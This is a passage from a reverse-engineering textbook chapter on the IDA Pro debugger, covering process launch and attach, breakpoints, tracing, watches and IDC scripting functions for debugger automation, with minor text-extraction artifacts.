as the file opened in the database. If IDA can find no process with a match-

ing name, IDA will display a list of every running process and leave it to you

to choose the correct process to attach to. In any case, you may attach to any

of the displayed processes, but IDA has no way to guarantee that the process

was started with same binary image that is loaded in the open IDA database.

IDA behaves differently if the currently open database is a shared library.

On Windows systems, IDA will filter the displayed process list to just those

processes that have the corresponding .dll file loaded. For example, if you

are currently analyzing wininet.dll in IDA, then when you select Debugger

Attach to Process, you will see only those processes that currently have

wininet.dll loaded. On Linux and OS X systems, IDA does not have this

filtering ability and displays every process to which you have the rights to

attach.

As an alternative to attaching to an existing process, you may opt to launch

a new process under debugger control. With no database open, a new pro-

cess can be launched via DebuggerRun. When a database is open, a new

process can be launched via DebuggerStart Process or DebuggerRun

to Cursor. Using the former causes the new process to execute until it hits a

breakpoint (which you need to have set prior to choosing DebuggerStart

Process) or until you elect to pause the process using DebuggerPause Pro-

cess. Using DebuggerRun to Cursor automatically sets a breakpoint at the

current cursor location prior to starting the new process. In this case, the new

process will execute until the current cursor location is reached or until an

The IDA Debugger 517

earlier breakpoint is hit. If execution never reaches the current cursor loca-

tion (or any other breakpoint), the process will continue to run until it is

forcibly paused or terminated (DebuggerTerminate Process).

Launching a process under debugger control (as opposed to attaching

to an existing process) is the only way to monitor every action the process

takes. With breakpoints set prior to process initiation, it becomes possible

to closely monitor a process’s entire startup sequence. Controlling startup

sequences is particularly important in the case of programs that have been

obfuscated, because you will often want to pause the process immediately

after the de-obfuscation routines complete and before the process begins

its normal operations.

Another advantage to launching a process from an open IDA database is

that IDA performs its initial autoanalysis on the process image before launch-

ing the process. This results in significantly better disassembly quality over

that attained when attaching the debugger to an existing process.

IDA’s debugger is capable of both local and remote debugging. For local

debugging, you can only debug binaries that will run on your platform. There

is no emulation layer that allows binaries from alternate platforms or CPU

types to be executed within IDA’s local debugger. For remote debugging,

IDA ships with a number of debugging servers including implementations

for Windows 32/64, Windows CE/ARM, Mac OS X 32/64, Linux 32/64/

ARM, and Android. The debugging servers are intended to execute along-

side the binary that you intend to debug. Once you have a remote debugging

server running, IDA can communicate with the server to launch or attach

to a target process on the remote machine. For Windows CE ARM devices,

IDA communicates with the remote device using ActiveSync and installs the

debugging server remotely. IDA is also capable of communicating with the

gdbserver1 component of the GNU Debugger2 (gdb) or with programs that

are linked with a suitable gdb remote stub.3 Finally, for remote debugging on

Symbian devices, you must install and configure Metrowerk’s App TRK4 in

order for IDA to communicate with the device over a serial port. In any case,

IDA is capable of acting as a debugger frontend only for processing running

on x86, x64, MIPS, ARM, and PPC processors. Remote debugging is dis-

cussed in Chapter 26.

As with any other debugger, if you intend to use IDA’s debugger to

launch new processes, the original executable file is required to be present

on the debugging host, and the original binary will be executed with the

full privileges of the user running IDA. In other words, it is not sufficient to

have only an IDA database loaded with the binary you wish to debug. This is

extremely important to understand if you intend to use the IDA debugger

for malware analysis. You can easily infect the debugging target machine if

you fail to properly control the malware sample. IDA attempts to warn you of

1. See http://www.sourceware.org/gdb/current/onlinedocs/gdb/Server.html#Server.

2. See http://www.gnu.org/software/gdb/.

3. See http://www.sourceware.org/gdb/current/onlinedocs/gdb/Remote-Stub.html#Remote-Stub.

4. See http://www.tools.ext.nokia.com/agents/index.htm.

518 Chapter 24

this possibility anytime you select DebuggerStart Process (or Debugger

Attach to process with an open database) by displaying a debugger warning

message stating the following:

You are going to launch the debugger. Debugging a program

means that its code will be executed on your system.

Be careful with malicious programs, viruses and trojans!

REMARK: if you select ‘No’, the debugger will be automatically

disabled.

Are you sure you want to continue?

Selecting No in response to this warning causes the Debugger menu

to be removed from the IDA menu bar. The Debugger menu will not be

restored until you close the active database.

It is highly recommended that you perform any debugging of malicious

software within a sandbox environment. In contrast, the x86 emulator plug-

in discussed in Chapter 21 neither requires that the original binary be present

nor executes any of the binary’s instructions on the machine performing the

emulation.

Basic Debugger Displays

Regardless of how you happen to launch the debugger, once your process of

interest has been paused under debugger control, IDA enters its debugger

mode (as opposed to normal disassembly mode), and you are presented with

several default displays. The default debugger display is shown in Figure 24-5.

Figure 24-5: IDA debugger display

The IDA Debugger 519

If you are accustomed to using other Windows debuggers such as

OllyDbg5 or Immunity Debugger,6 one of your first thoughts might be that

not much information is displayed on the screen. This is primarily a result

of the fact that IDA defaults to a font size that is actually readable. If you find

yourself missing the micro fonts used in other debuggers, you can easily

change things via the OptionsFont menu. You may also wish to make use

of saved IDA desktops (WindowsSave Desktop) if you develop a fondness

for a specific layout of your debugger windows.

As shown in the Figure 24-5, the debugger toolbar X replaces the dis-

assembly toolbar. A number of standard (from a debugging standpoint)

tools are present, including process control tools and breakpoint manipula-

tion tools.

The IDA View-EIP Y disassembly window is a default disassembly listing

window when the debugger is active. It also happens to be synchronized with

the current value of the instruction pointer register. If IDA detects that a reg-

ister points to a memory location within the disassembly window, the name

of that register is displayed in the left margin, opposite the address to which

the register points. In Figure 24-5, the location to which EIP points is flagged

in IDA View-EIP (note that EDX also points to the same location in this exam-

ple). By default, IDA highlights breakpoints in red and the next instruction

to be executed (the one to which the instruction pointer points) in blue.

Debugger-related disassemblies are generated via the same disassembly pro-

cess used in standard disassembly mode. Thus, IDA’s debugger offers per-

haps the best disassembly capability to be found in a debugger. Additionally,

if you launched the debugger from an open IDA database, IDA is able to

characterize all of the executable content based on analysis performed prior

to launching the debugger. IDA’s ability to disassemble any library code that

has been loaded by the process will be somewhat more limited because IDA

has not had a chance to analyze the associated .dll file prior to launching the

debugger.

The Stack View Z window is another standard disassembly view primarily

used to display the data contents of the process’s runtime stack. All registers

that point to stack locations are noted as such in the General Registers [

view (such as EBP in this case). Through the use of comments, IDA makes

every attempt to provide context information for each data item on the stack.

When the stack item is a memory address, IDA attempts to resolve the address

to a function location (this helps highlight the location from which a func-

tion was called). When the stack item is a data pointer, a reference to the

associated data item is displayed. The remaining default displays include the

Hex view \, which offers a standard hex dump of memory, the Modules ]

view, which displays a list of modules currently loaded in the process image,

and the Threads ^ view, which displays a list of threads in the current pro-

cess. Double-clicking any listed thread causes the IDA View-EIP disassembly

5. See http://www.ollydbg.de/.

6. See http://www.immunityinc.com/products-immdbg.shtml.

520 Chapter 24

window to jump to the current instruction within the selected thread and

updates the General Registers view to reflect the current values for registers

within the selected thread.

The General Registers window (also shown in Figure 24-6) displays the

current contents of the CPU’s general-purpose registers. Additional windows

for displaying the contents of the CPU’s segment, floating-point, or MMX

registers may be opened from the Debugger menu.

Figure 24-6: The General Registers display

Within the General Registers window, register contents are displayed to

the right of the associated register name followed by a description of each

umn. Right-clicking a register value or flag bit provides access to a Modify

menu item, which allows you to change the contents of any register or CPU

flag. Menu options offer quick access to zero a value, toggle a value, incre-

ment a value, or decrement a value. Toggling values is particularly useful for

changing CPU flag bits. Right-clicking any register value also provides access

to the Open Register Window menu item. Selecting Open Register Window

causes IDA to open a new disassembly window centered at the memory loca-

tion held in the selected register. If you ever find that you have inadvertently

closed either IDA View-EIP or IDA View-ESP, use the Open Register Window

command on the appropriate register to reopen the lost window. If a register

appears to point to a valid memory location, then the right-angle arrow con-

trol to the right of that register’s value will be active and highlighted in black.

Clicking an active arrow opens a new disassembly view centered on the corre-

sponding memory location.

The Modules window displays a list of all executable files and shared

libraries loaded into the process memory space. Double-clicking any module

named in the list opens a list of symbols exported by that module. Figure 24-7

shows an example of the contents of kernel32.dll. The symbol list provides an

easy way to track down functions within loaded libraries if you wish to set

breakpoints on entry to those functions.

The IDA Debugger 521

Figure 24-7: The Modules window with associated module

contents

Additional debugger displays are accessible using various debugger

menu selections. Displays pertaining to debugger operations will be discussed

in the following section, “Process Control.” Along with the debugger-specific

displays, all traditional IDA subviews, such as Functions and Segments, remain

available via the ViewsOpen Subviews command.

Process Control

Perhaps the most important feature of any debugger is the ability to closely

control—and modify, if desired—the behavior of the process being debugged.

To that end, most debuggers offer commands that allow one or more instruc-

tions to be executed before returning control to the debugger. Such com-

mands are often used in conjunction with breakpoints that allow the user to

specify that execution should be interrupted when a designated instruction

is reached or when a specific condition is met.

Basic execution of a process under debugger control is accomplished

through the use of various Step, Continue, and Run commands. Because

they are used so frequently, it is helpful to become familiar with the toolbar

buttons and hotkey sequences associated with these commands. Figure 24-8

shows the toolbar buttons associated with execution of a process.

Figure 24-8: Debugger process control tools

The behavior of each of these commands is described in the following list:

Continue Resumes execution of a paused process. Execution continues

until a breakpoint is hit, the user pauses or terminates execution, or the

process terminates on its own.

Continue

Terminate

CTRL

-F2

Step Over

Run to Cursor

Pause Step Into

Run Until Return

CTRL

-F7

522 Chapter 24

Pause Pauses a running process.

Terminate Terminates a running process.

Step Into Executes the next instruction only. If the next instruction is a

function call, breaks on the first instruction of the target function. Hence

the name Step Into, since execution steps into any function being called.

Step Over Executes the next instruction only. If the next instruction is

a function call, treats the call as a single instruction, breaking once the

function returns. Hence the name Step Over, since stepping proceeds

over functions rather than through them as with Step Into. Execution

may be interrupted prior to completion of the function call if a break-

point is encountered. Step Over is very useful as a time-saver when the

behavior of a function is well known and uninteresting.

Run Until Return Resumes execution of the current function and does

not stop until that function returns (or a breakpoint is encountered).

This operation is useful when you have seen enough of a function and

you wish to get out of it or when you inadvertently step into a function

that you meant to step over.

Run to Cursor Resumes execution of the process and stops when exe-

cution reaches the current cursor location (or a breakpoint is hit). This

feature is useful for running through large blocks of code without the

need to set a permanent breakpoint at each location where you wish to

pause. Beware that the program may not pause if the cursor location is

bypassed or otherwise never reached.

In addition to toolbar and hotkey access, all of the execution control

commands are accessible via the Debugger menu. Regardless of whether a

process pauses after a single step or hitting a breakpoint, each time the pro-

cess pauses, all debugger-related displays are updated to reflect the state of

the process (CPU registers, flags, memory contents) at the time the process

was paused.

Breakpoints

Breakpoints are a debugger feature that goes hand in hand with process exe-

cution and interruption (pausing). Breakpoints are set as a means of inter-

rupting program execution at very specific locations within the program. In

a sense a breakpoint is a more permanent extension of the Run to Cursor

concept in that once a breakpoint is set at a given address, execution will

always be interrupted when execution reaches that location, regardless of

whether the cursor remains positioned on that location or not. However,

while there is only one cursor to which execution can run, it is possible to

set many breakpoints all over a program, the arrival at any one of which will

The IDA Debugger 523

interrupt execution of the program. Breakpoints are set in IDA by navigating

to the location at which you want execution to pause and using the F2 hotkey

(or right-clicking and selecting Add Breakpoint). Addresses at which break-

points have been set are highlighted with a red (by default) band across the

entire disassembly line. A breakpoint may be removed by pressing F2 a sec-

ond time to toggle the breakpoint off. A complete list of breakpoints cur-

rently set within a program may be viewed via DebuggerBreakpoints

Breakpoint List.

By default, IDA utilizes software breakpoints, which are implemented by

replacing the opcode byte at the breakpoint address with a software break-

point instruction. For x86 binaries, this is the int 3 instruction, which uses

opcode value 0xCC. Under normal circumstances, when a software breakpoint

instruction is executed, the operating system transfers control to any debugger

that may be monitoring the interrupted process. As discussed in Chapter 21,

obfuscated code may take advantage of the behavior of software breakpoints

in an attempt to hinder normal operation of any attached debugger.

As an alternative to software breakpoints, some CPUs (such as the x86,

actually 386, and later) offer support for hardware-assisted breakpoints. Hard-

ware breakpoints are typically configured through the use of dedicated CPU

registers. For x86 CPUs, these registers are called DR0–7 (debug registers 0

through 7). A maximum of four hardware breakpoints can be specified using

x86 registers DR0–3. The remaining x86 debug registers are used to specify

additional constraints on each breakpoint. When a hardware breakpoint is

enabled, there is no need to substitute a special instruction into the program

being debugged. Instead, the CPU itself decides whether execution should

be interrupted or not based on values contained within the debug registers.

Once a breakpoint has been set, it is possible to modify various aspects of

its behavior. Beyond simply interrupting the process, debuggers often sup-

port the concept of conditional breakpoints, which allow users to specify a con-

dition that must be satisfied before the breakpoint is actually honored. When

such a breakpoint is reached and the associated condition is not satisfied, the

debugger automatically resumes execution of the program. The general idea

is that the condition is expected to be satisfied at some point in the future,

resulting in interruption of the program only when the condition you are

interested in has been satisfied.

The IDA debugger supports both conditional and hardware breakpoints.

In order to modify the default (unconditional, software-based) behavior of

a breakpoint, you must edit a breakpoint after it has been set. In order to

access the breakpoint-editing dialog, you must right-click an existing break-

point and select Edit Breakpoint. Figure 24-9 shows the resulting Breakpoint

Settings dialog.

524 Chapter 24

Figure 24-9: The Breakpoint Settings dialog

The Location box indicates the address of the breakpoint being edited,

while the Enabled checkbox indicates whether the breakpoint is currently

active or not. A breakpoint that is disabled is not honored regardless of any

condition that may be associated with the breakpoint. The Hardware check-

box is used to request that the breakpoint be implemented in hardware

rather than software.

WARNING A word of caution concerning hardware breakpoints: Though the x86 only supports

four hardware breakpoints at any given time, as of this writing (IDA version 6.1), IDA

will happily allow you to designate more than four hardware breakpoints. However,

only four of them will be honored. Any additional hardware breakpoints will be

ignored.

When specifying a hardware breakpoint, you must use the Hardware

breakpoint mode radio buttons to specify whether the breakpoint behavior

is to break on execute, break on write, or break on read/write. The latter

two categories (break on write and break on read/write) allow you to create

breakpoints that trigger when a specific memory location (usually a data

location) is accessed, regardless of what instruction happens to be executing

at the time the access takes place. This is very useful if you are more inter-

ested in when your program accesses a piece of data than where the data is

accessed from.

In addition to specifying a mode for your hardware breakpoint, you must

specify a size. For execute breakpoints the size must be 1 byte. For write or

read/write breakpoints, the size may be set to 1, 2, or 4 bytes. When the size

is set to 2 bytes, the breakpoint’s address must be word aligned (a multiple

of 2 bytes). Similarly, for 4-byte breakpoints, the breakpoint address must be

double-word aligned (a multiple of 4 bytes). A hardware breakpoint’s size is

combined with its address to form a range of bytes over which the breakpoint

may be triggered. An example may help to explain. Consider a 4-byte write

The IDA Debugger 525

breakpoint set at address 0804C834h. This breakpoint will be triggered by a

1-byte write to 0804C837h, a 2-byte write to 0804C836h, and a 4-byte write to

0804C832h, among others. In each of these cases, at least 1 byte in the range

0804C834h0804C837h is written. More information on the behavior of x86 hard-

ware breakpoints can be found in the Intel 64 and IA-32 Architectures Software

Developer’s Manual, Volume 3B: System Programming Guide, Part 2.7

Conditional breakpoints are created by providing an expression in the

Breakpoint Settings dialog’s Condition field. Conditional breakpoints are a

debugger feature, not an instruction set or CPU feature. When a breakpoint

is triggered, it is the debugger’s job to evaluate any associated conditional

expression and determine whether the program should be paused (the con-

dition is met) or whether execution should simply continue (the condition is

not met). Therefore, conditions may be specified for both software and hard-

ware breakpoints.

IDA breakpoint conditions are specified using IDC (not Python) expres-

sions. Expressions that evaluate to non-zero are considered true, satisfying

the breakpoint condition and triggering the breakpoint. Expressions that

evaluate to zero are considered false, failing to satisfy the breakpoint condi-

tion and failing to trigger the associated breakpoint. In order to assist in the

creation of breakpoint expressions, IDA makes special register variables avail-

able within IDC (again, not Python) to provide direct access to register con-

tents in breakpoint expressions. These variables are named after the registers

themselves and include EAX, EBX, ECX, EDX, ESI, EDI, EBP, ESP, EFL, AX, BX, CX, DX, SI,

DI, BP, SP, AL, AH, BL, BH, CL, CH, DL, and DH. These register variables are accessible

only when the debugger is active.

Unfortunately, no variables exist that allow direct access to the proc-

essor flag bits. In order to access individual CPU flags, you need to call the

GetRegValue function to obtain the value of the desired flag bit, such as CF.

If you need a reminder regarding valid register and flag names, refer to the

labels along the left and right edges of the General Registers window. A few

example breakpoint expressions are shown here:

EAX == 100 // break if eax holds the value 100

ESI > EDI // break if esi is greater than edi

Dword(EBP-20) == 10 // Read current stack frame (var_20) and compare to 10

GetRegValue("ZF") // break if zero flag is set

EAX = 1 // Set EAX to 1, this also evaluates to true (non-zero)

EIP = 0x0804186C // Change EIP, perhaps to bypass code

Two things to note about breakpoint expressions are the fact that IDC

functions may be called to access process information (as long as the func-

tion returns a value) and the fact that assignment can be used as a means of

modifying register values at specific locations during process execution. Ilfak

himself demonstrated this technique as an example of overriding a function

return value.8

7. See http://www.intel.com/products/processor/manuals/.

8. See http://www.hexblog.com/2005/11/simple_trick_to_hide_ida_debug.html and http://www

.hexblog.com/2005/11/stealth_plugin_1.html.

526 Chapter 24

The last breakpoint options that can be configured in the Breakpoint

Settings dialog are grouped into the Actions box on the right side of the dia-

log. The Break checkbox specifies whether program execution should actually

be paused (assuming any associated condition is true) when the breakpoint

is reached. It may seem unusual to create a breakpoint that doesn’t break,

but this is actually a useful feature if all you want to do is modify a specific

memory or register value each time an instruction is reached without requir-

ing the program to be paused at the same time. Selecting the Trace check-

box causes a trace event to be logged each time the breakpoint is hit.

Tracing

Tracing offers a means of logging specific events that occur while a process is

executing. Trace events are logged to a fixed-size trace buffer and may option-

ally be logged to a trace file. Two styles of tracing are available: instruction

tracing and function tracing. When instruction tracing is enabled (Debugger

TracingInstruction Tracing), IDA records the address, the instruction, and

the values of any registers (other than EIP) that were changed by the instruc-

tion. Instruction tracing can slow down a debugged process considerably,

because the debugger must single-step the process in order to monitor and

record all register values. Function tracing (DebuggerTracingFunction

Tracing) is a subset of instruction tracing in which only function calls (and

optionally returns) are logged. No register values are logged for function

trace events.

Three types of individual trace events are also available: write traces,

read/write traces, and execution traces. As their names imply, each allows

logging of a trace event when a specific action occurs at a designated address.

Each of these individual traces is implemented using nonbreaking breakpoints

with the trace option set. Write and read/write traces are implemented using

hardware breakpoints and thus fall under the same restrictions mentioned

previously for hardware breakpoints, the most significant being that no more

than four hardware-assisted breakpoints or traces may be active at any given

time. By default, execution traces are implemented using software break-

points, and thus there is no limit on the number of execution traces that can

be set within a program.

Figure 24-10 shows the Tracing Options (DebuggerTracingTracing

Options) dialog used to configure the debugger’s tracing operations.

Options specified here apply to function and instruction tracing only.

These options have no effect on individual trace events. The Trace buffer

size option specifies the maximum number of trace events that may be dis-

played at any given time. For a given buffer size n, only the n most recent

trace events are displayed. Naming a log file causes all trace events to be

appended to the named file. A file dialog is not offered when specifying a

log file, so you must specify the complete path to the log file yourself. An IDC

expression may be entered as a stop condition. The condition is evaluated

prior to tracing through each instruction. If the condition evaluates to true,

execution is immediately paused. The effect of this expression is to act as a

conditional breakpoint that is not tied to any specific location.

The IDA Debugger 527

Figure 24-10: The Tracing Options dialog

The Mark consecutive traced events with same IP option, when checked,

causes consecutive trace events originating from the same instruction (IP

here means Instruction Pointer) to be flagged with an equal sign. An example

in which consecutive events can originate at the same instruction address

occurs when the REP9 prefix is used in x86 programs. In order for an instruc-

tion trace to show each repetition at the same instruction address, the Log

if same IP option must also be selected. Without this option selected, an

instruction prefixed with REP is listed only once each time it is encountered.

The following listing shows a partial instruction trace using the default trace

settings:

Thread Address Instruction Result

------ ------- ----------- ------

X 00000150 .text:sub_401320+17 rep movsb ECX=00000000 ESI=0022FE2C EDI=0022FCF4

00000150 .text:sub_401320+19 pop esi ESI=00000000 ESP=0022FCE4

Note that the movsb instruction X is listed only once.

In the following listing, Log if same IP has been selected, resulting in

each iteration of the rep loop being logged:

Thread Address Instruction Result

------ ------- ----------- ------

000012AC .text:sub_401320+17 rep movsb ECX=0000000B ESI=0022FE21 EDI=0022FCE9 EFL=00010206 RF=1

000012AC .text:sub_401320+17 rep movsb ECX=0000000A ESI=0022FE22 EDI=0022FCEA

000012AC .text:sub_401320+17 rep movsb ECX=00000009 ESI=0022FE23 EDI=0022FCEB

000012AC .text:sub_401320+17 rep movsb ECX=00000008 ESI=0022FE24 EDI=0022FCEC

000012AC .text:sub_401320+17 rep movsb ECX=00000007 ESI=0022FE25 EDI=0022FCED

000012AC .text:sub_401320+17 rep movsb ECX=00000006 ESI=0022FE26 EDI=0022FCEE

000012AC .text:sub_401320+17 rep movsb ECX=00000005 ESI=0022FE27 EDI=0022FCEF

000012AC .text:sub_401320+17 rep movsb ECX=00000004 ESI=0022FE28 EDI=0022FCF0

000012AC .text:sub_401320+17 rep movsb ECX=00000003 ESI=0022FE29 EDI=0022FCF1

9. The REP prefix is an instruction modifier that causes certain x86 string instructions such as

movs and scas to be repeated based on a count contained in the ECX register.

528 Chapter 24

000012AC .text:sub_401320+17 rep movsb ECX=00000002 ESI=0022FE2A EDI=0022FCF2

000012AC .text:sub_401320+17 rep movsb ECX=00000001 ESI=0022FE2B EDI=0022FCF3

000012AC .text:sub_401320+17 rep movsb ECX=00000000 ESI=0022FE2C EDI=0022FCF4 EFL=00000206 RF=0

000012AC .text:sub_401320+19 pop esi ESI=00000000 ESP=0022FCE4

Finally, in the following listing, the Mark consecutive traced events with

same IP option has been enabled, resulting in special markings that high-

light the fact that the instruction pointer has not changed from one instruc-

tion to the next:

Thread Address Instruction Result

------ ------- ----------- ------

000017AC .text:sub_401320+17 rep movsb ECX=0000000B ESI=0022FE21 EDI=0022FCE9 EFL=00010206 RF=1

= = = ECX=0000000A ESI=0022FE22 EDI=0022FCEA

= = = ECX=00000009 ESI=0022FE23 EDI=0022FCEB

= = = ECX=00000008 ESI=0022FE24 EDI=0022FCEC

= = = ECX=00000007 ESI=0022FE25 EDI=0022FCED

= = = ECX=00000006 ESI=0022FE26 EDI=0022FCEE

= = = ECX=00000005 ESI=0022FE27 EDI=0022FCEF

= = = ECX=00000004 ESI=0022FE28 EDI=0022FCF0

= = = ECX=00000003 ESI=0022FE29 EDI=0022FCF1

= = = ECX=00000002 ESI=0022FE2A EDI=0022FCF2

= = = ECX=00000001 ESI=0022FE2B EDI=0022FCF3

= = = ECX=00000000 ESI=0022FE2C EDI=0022FCF4 EFL=00000206 RF=0

000017AC .text:sub_401320+19 pop esi ESI=00000000 ESP=0022FCE4

The last two options we will mention concerning tracing are Trace over

debugger segments and Trace over library functions. When Trace over debug-

ger segments is selected, instruction and function call tracing is temporarily

disabled anytime execution proceeds to a program segment outside any of

the file segments originally loaded into IDA. The most common example of

this is a call to a shared library function. Selecting Trace over library func-

tions temporarily disables function and instruction tracing anytime execu-

tion enters a function that IDA has identified as a library function (perhaps

via FLIRT signature matching). Library functions linked into a binary should

not be confused with library functions that a binary accesses via a shared library

file such as a DLL. Both of these options are enabled by default, resulting in

better performance while tracing (because the debugger does not need to

step into library code) as well as a substantial reduction in the number of

trace events generated, since instruction traces through library code can

rapidly fill the trace buffer.

Stack Traces

A stack trace is a display of the current call stack, or sequence of function calls

that have been made in order for execution to reach a particular location

within a binary. Figure 24-11 shows a sample stack trace generated using the

DebuggerStack Trace command.

The IDA Debugger 529

Figure 24-11: A sample stack trace

The top line in a stack trace lists the name of the function currently exe-

cuting. The second line indicates the function that called the current func-

tion and the address from which that call was made. Successive lines indicate

the point from which each function was called. A debugger is able to create a

stack trace display by walking the stack and parsing each stack frame that it

encounters, and it typically relies on the contents of the frame pointer regis-

ter (EBP for x86) to locate the base of each stack frame. When a stack frame

is located, the debugger can extract a pointer to the next stack frame (the

saved frame pointer) as well as the saved return address, which is used to

locate the call instruction used to invoke the current function. IDA’s debug-

ger cannot trace through stack frames that do not utilize EBP as a frame

pointer. At the function (rather than individual instruction) level, stack

traces are useful for answering the question, “How did I get here?” or, more

correctly, “What sequence of function calls led to this particular location?”

Watches

While debugging a process, you may wish to constantly monitor the value

contained in one or more variables. Rather than requiring you to navigate

to the desired memory locations each time the process is paused, many debug-

gers allow you to specify lists of memory locations whose values should be dis-

played each time the process is stopped in the debugger. Such lists are called

watch lists, because they allow you to watch as the contents of designated

memory locations change during program execution. Watch lists are simply

a navigational convenience; they do not cause execution to pause like a

breakpoint.

Because they are focused on data, watch points (addresses designated

to be watched) are most commonly set in the stack, heap, or data sections

of a binary. Watches are set in the IDA debugger by right-clicking a memory

item of interest and selecting Add Watch. Determining exactly which address

to set a watch on may require some thought. Determining the address of a

global variable is somewhat less challenging than determining the address

of a local variable because global variables are allocated and assigned fixed

addresses at compile time. Local variables, on the other hand, don’t exist

until runtime, and even then they exist only once the function in which they

are declared has been called. With the debugger active, once you have

stepped into a function, IDA is capable of reporting the addresses of local

variables within that function. Figure 24-12 shows the result of mousing over

a local variable named arg_0 (actually a parameter passed into the function).

530 Chapter 24

Figure 24-12: Debugger resolution of a local variable address

Double-clicking a local variable within an active function causes IDA to

jump the main IDA View window to the address of that local variable. Having

arrived at the variable’s address, you may then add a watch on that address

using the Add Watch context-sensitive menu option, though you will need

to manually enter the address into the Watch Address dialog. If, instead,

you take the time to name the memory location, IDA will automatically add

a watch if you apply the same menu option to the name rather than the

address.

You can access a list of all watches currently in effect via Debugger

WatchesWatch List. You can delete individual watches by highlighting the

desired watch in the watch list and pressing DELETE.

Automating Debugger Tasks

In Chapters 15 through 19, we covered the basics of IDA scripting and the

IDA SDK and demonstrated the usefulness of these capabilities during static

analysis of binaries. Launching a process and working in the more dynamic

environment of a debugger doesn’t make scripting and plug-ins any less

useful. Interesting uses for the automation provided by scripts and plug-ins

include analyzing runtime data available while a process is being debugged,

implementing complex breakpoint conditions, and implementing measures

to subvert anti-debugging techniques.

Scripting Debugger Actions

All of the IDA scripting capabilities discussed in Chapter 15 continue to be

accessible when you are using the IDA debugger. Scripts may be launched

from the File menu, associated with hotkeys, and invoked from the IDA

scripting command line. In addition, user-created IDC functions may be ref-

erenced from breakpoint conditions and tracing termination expressions.

Basic scripting functions offer the capability to set, modify, and enumer-

ate breakpoints and the ability to read and write register and memory values.

Memory access is provided by the DbgByte, PatchDbgByte, DbgWord, PatchDbgWord,

DbgDword, and PatchDbgDword functions (analogous to the Byte, Word, Dword, and

PatchXXX functions described in Chapter 15). Register and breakpoint manip-

ulation is made possible by the following functions (please see the IDA help

file for a complete list).

long GetRegValue(string reg)

Returns the value of the named register, such as EAX, as discussed previ-

ously. In IDC only, register values may also be easily accessed by using

the desired register’s name as a variable within an IDC expression.

The IDA Debugger 531

bool SetRegValue(number val, string name)

Sets the value of the named register, such as EAX. If you are using IDC,

name on the left side of an assignment statement.

bool AddBpt(long addr)

Adds a software breakpoint at the indicated address.

bool AddBptEx(long addr, long size, long type)

Adds a breakpoint of the specified size and type at the indicated address.

Type should be one of the BPT_xxx constants described in idc.idc or the

IDA help file.

bool DelBpt(long addr)

Deletes a breakpoint at the specified address.

long GetBptQty()

Returns the number of breakpoints set within a program.

long GetBptEA(long bpt_num)

Returns the address at which the indicated breakpoint is set.

long/string GetBptAttr(long addr, number attr)

Returns an attribute associated with the breakpoint at the indicated

address. The return value may be a number or a string depending on

which attribute value has been requested. Attributes are specified using

one of the BPTATTR_xxx values described in idc.idc or the IDA help file.

bool SetBptAttr(long addr, number attr, long value)

Sets the specified attribute of the specified breakpoint to the specified

value. Do not use this function to set breakpoint condition expressions

(use SetBptCnd instead).

bool SetBptCnd(long addr, string cond)

Sets the breakpoint condition to the provided conditional expression,

which must be a valid IDC expression.

long CheckBpt(long addr)

Gets the breakpoint status at the specified address. Return values indi-

cate whether there is no breakpoint, the breakpoint is disabled, the

breakpoint is enabled, or the breakpoint is active. An active breakpoint

is a breakpoint that is enabled while the debugger is also active.

The following script demonstrates how to install a custom IDC breakpoint-

handling function at the current cursor location:

#include <idc.idc>

* The following should return 1 to break, and 0 to continue execution.

static my_breakpoint_condition() {

return AskYN(1, "my_breakpoint_condition activated, break now?") == 1;

}

532 Chapter 24

* This function is required to register my_breakpoint_condition

* as a breakpoint conditional expression

static main() {

auto addr;

addr = ScreenEA();

AddBpt(addr);

SetBptCnd(addr, "my_breakpoint_condition()");

}

The complexity of my_breakpoint_condition is entirely up to you. In this

example, each time the breakpoint is hit, a dialog will be displayed asking the

user if she would like to continue execution of the process or pause at the

current location. The value returned by my_breakpoint_condition is used by

the debugger to determine whether the breakpoint should be honored or

ignored.

Programmatic control of the debugger is possible from both the SDK

and through the use of scripts. Within the SDK, IDA utilizes an event-driven

model and provides callback notifications to plug-ins when specific debugger

events occur. Unfortunately, IDA’s scripting capabilities don’t facilitate the

use of an event-driven paradigm within scripts. As a result, Hex-Rays intro-

duced a number of scripting functions that allow for synchronous control of

the debugger from within scripts. The basic approach required to drive the

debugger using a script is to initiate a debugger action and then wait for the

corresponding debugger event code. Keep in mind that a call to a synchro-

nous debugger function (which is all you can do in a script) blocks all other

IDA operations until the call completes. The following list details several of

the debugging extensions available for scripts:

long GetDebuggerEvent(long wait_evt, long timeout)

Waits for a debugger event (as specified by wait_evt) to take place within

the specified number of seconds (–1 waits forever). Returns an event type

code that indicates the type of event that was received. Specify wait_evt

using a combination of one or more WFNE_xxx (WFNE stands for Wait For

Next Event) flags. Possible return values are documented in the IDA

help file.

bool RunTo(long addr)

Runs the process until the specified location is reached or until a break-

point is hit.

bool StepInto()

Steps the process one instruction, stepping into any function calls.

bool StepOver()

Steps the process one instruction, stepping over any function calls. This

call may terminate early if a breakpoint is hit.

bool StepUntilRet()

Runs until the current function call returns or until a breakpoint is hit.

The IDA Debugger 533

bool EnableTracing(long trace_level, long enable)

Enables (or disables) the generation of trace events. The trace_level

parameter should be set to one of the TRACE_xxx constants defined in

idc.idc.

long GetEventXXX()

A number of functions are available for retrieving information related to

the current debug event. Some of these functions are valid only for spe-

cific event types. You should test the return value of GetDebuggerEvent in

order to make sure that a particular GetEventXXX function is valid.

GetDebuggerEvent must be called after each function that causes the pro-

cess to execute in order to retrieve the debugger’s event code. Failure to do

so may prevent follow-up attempts to step or run the process. For example,

the following code fragment will step the debugger only one time because

GetDebuggerEvent does not get called to clear the last event type in between

invocations of StepOver.

StepOver();

StepOver(); //this and all subsequent calls will fail

StepOver();

The proper way to perform an execution action is to follow up each call

with a call to GetDebuggerEvent, as shown in the following example:

StepOver();

GetDebuggerEvent(WFNE_SUSP, -1);

StepOver();

GetDebuggerEvent(WFNE_SUSP, -1);

StepOver();

GetDebuggerEvent(WFNE_SUSP, -1);

StepOver();

GetDebuggerEvent(WFNE_SUSP, -1);

The calls to GetDebuggerEvent allow execution to continue even if you

choose to ignore the return value from GetDebuggerEvent. The event type

WFNE_SUSP indicates that we wish to wait for an event that results in suspension

of the debugged process, such as an exception or a breakpoint. You may

have noticed that there is no function that simply resumes execution of a sus-

pended process.10 However, it is possible to achieve the same effect by using

the WFNE_CONT flag in a call to GetDebuggerEvent, as shown here:

GetDebuggerEvent(WFNE_SUSP | WFNE_CONT, -1);

This particular call waits for the next available suspend event after first

resuming execution by continuing the process from the current instruction.

10. In reality, there is a macro named ResumeProcess that is defined as

